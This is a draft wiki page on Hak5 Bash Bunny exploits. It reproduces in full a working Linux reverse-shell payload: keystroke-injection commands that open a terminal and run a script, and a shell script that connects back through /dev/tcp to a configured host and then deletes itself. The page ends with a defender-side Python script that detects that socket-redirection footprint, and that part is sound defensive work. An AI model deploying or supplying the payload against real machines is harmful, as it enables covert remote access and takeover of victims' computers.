Difference between revisions of "Bash Bunny Exploits"
Revision as of 12:42, 4 October 2021
Summary
This is a DRAFT. The Hak5 Bash Bunny will be used for various exploits which will be explained, documented and evaluated in the following chapters.
Requirements
- Operating system: Ubuntu 18.04 bionic amd64, Windows 10
- Hardware: Hak5 Bash Bunny
In order to get a general idea about the Bash Bunny, please refer to Hak5 Bash Bunny or the official Hak5 Documentation and Git repository.
Exploits
Reverse shell on Linux
For this exploit, the Linux Reverse Shell payload is used, which is in the remote access category on Bash Bunny's Git Repository.
bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell
The payload is to be copied from the library and pasted into either switch1 or switch2 on the Bash Bunny while the device is plugged in and set to Arming mode.
The payload itself is a text file payload.txt and comes with a script a.sh as well. It is well documented, which is quite a rarity for Bash Bunny payloads and helps with understanding the program. The contents are the following:
payload.txt
#!/bin/bash
#
# Title: Linux Reverse Shell
# Author: tuzzmaniandevil
# Version: 1.2
#
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
#
# Magenta..................Setup
# Yellow single blink......Executing
# Green....................Finished

# Config options
RHOST=127.0.0.1
RPORT=4444

# Start Setup
LED SETUP

# Gets Switch Position
GET SWITCH_POSITION

# Set Attack Mode
ATTACKMODE HID STORAGE

# Get the switch position
GET SWITCH_POSITION

# Open a terminal
Q CTRL-ALT t

# Wait for terminal to open
sleep 1

LED STAGE1

# Copy bash script
Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
Q STRING $SWITCH_POSITION
Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
Q ENTER

# Quit the terminal
LED CLEANUP
Q STRING exit
Q ENTER

LED FINISH
a.sh
#!/bin/bash
A="$0"
H=$1
P=$2
/bin/bash -c /bin/bash -i > /dev/tcp/$H/$P 0<&1 2>&1 &
disown $!
rm -f "$A"
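The redirection in a.sh leaves a distinctive footprint on the host it runs on: a shell whose stdin, stdout and stderr all point at one and the same TCP socket. The following Python, added here as a defender-side example and not part of the Hak5 payload or of this page's original content, flags that pattern from /proc; the /proc layout, the shell watch list and the sample data are assumptions.

```python
import os
import re
# Shell names (from /proc/<pid>/comm) to inspect; an assumed watch list.
SHELLS = {"bash", "sh", "dash", "zsh"}
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

def flag_reverse_shells(procs: dict) -> list:
    """procs maps pid -> {"comm": name, "fds": {fd: link_target}}. Returns pids of
    shells whose fds 0, 1 and 2 all resolve to one socket inode, the footprint of
    the payload's `> /dev/tcp/$H/$P 0<&1 2>&1` redirection."""
    hits = []
    for pid, info in procs.items():
        if info["comm"] not in SHELLS:
            continue
        inodes = set()
        for fd in (0, 1, 2):
            match = SOCKET_RE.match(info["fds"].get(fd, ""))
            if not match:
                break
            inodes.add(match.group(1))
        else:  # all three fds are sockets; require one and the same socket
            if len(inodes) == 1:
                hits.append(pid)
    return sorted(hits)

def snapshot_proc(proc_root: str = "/proc") -> dict:
    """Collect comm and fd link targets from a Linux /proc tree (assumed layout)."""
    procs = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc_root}/{entry}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"{proc_root}/{entry}/fd"
            fds = {int(fd): os.readlink(f"{fd_dir}/{fd}") for fd in os.listdir(fd_dir)}
        except OSError:
            continue  # process exited, or its fd table is not readable by us
        procs[int(entry)] = {"comm": comm, "fds": fds}
    return procs

# Constructed sample: 4242 matches the payload footprint; 1337 is a pty shell; 77 is not a shell.
SAMPLE = {
    4242: {"comm": "bash", "fds": {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}},
    1337: {"comm": "bash", "fds": {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}},
    77: {"comm": "sshd", "fds": {0: "socket:[5]", 1: "socket:[5]", 2: "socket:[5]"}},
}

if __name__ == "__main__":
    print("sample hits:", flag_reverse_shells(SAMPLE))  # [4242]
    print("live hits:", flag_reverse_shells(snapshot_proc()))
```

On a live Linux host the scan only sees processes whose fd tables the caller may read, so run it with sufficient privilege to cover other users' shells.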